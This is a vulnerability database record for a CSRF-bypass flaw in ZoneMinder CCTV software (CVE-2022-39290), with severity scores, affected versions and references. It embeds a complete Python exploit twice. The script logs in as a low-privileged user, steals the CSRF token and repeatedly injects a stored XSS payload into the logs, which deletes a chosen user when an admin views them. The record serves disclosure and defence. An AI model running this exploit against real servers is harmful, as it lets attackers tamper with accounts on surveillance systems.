VAR-202210-0233
Vulnerability from variot - Updated: 2025-01-30 21:11ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. ZoneMinder There is an authentication vulnerability in.Information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0233",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39290",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39290",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-39290",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39290",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-39290",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. ZoneMinder There is an authentication vulnerability in.Information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39290",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"id": "VAR-202210-0233",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:11:14.974000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=210329"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-xgv6-qv6c-399q"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39290/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2022-10-07T21:15:11.673000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2023-03-27T18:15:11.687000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
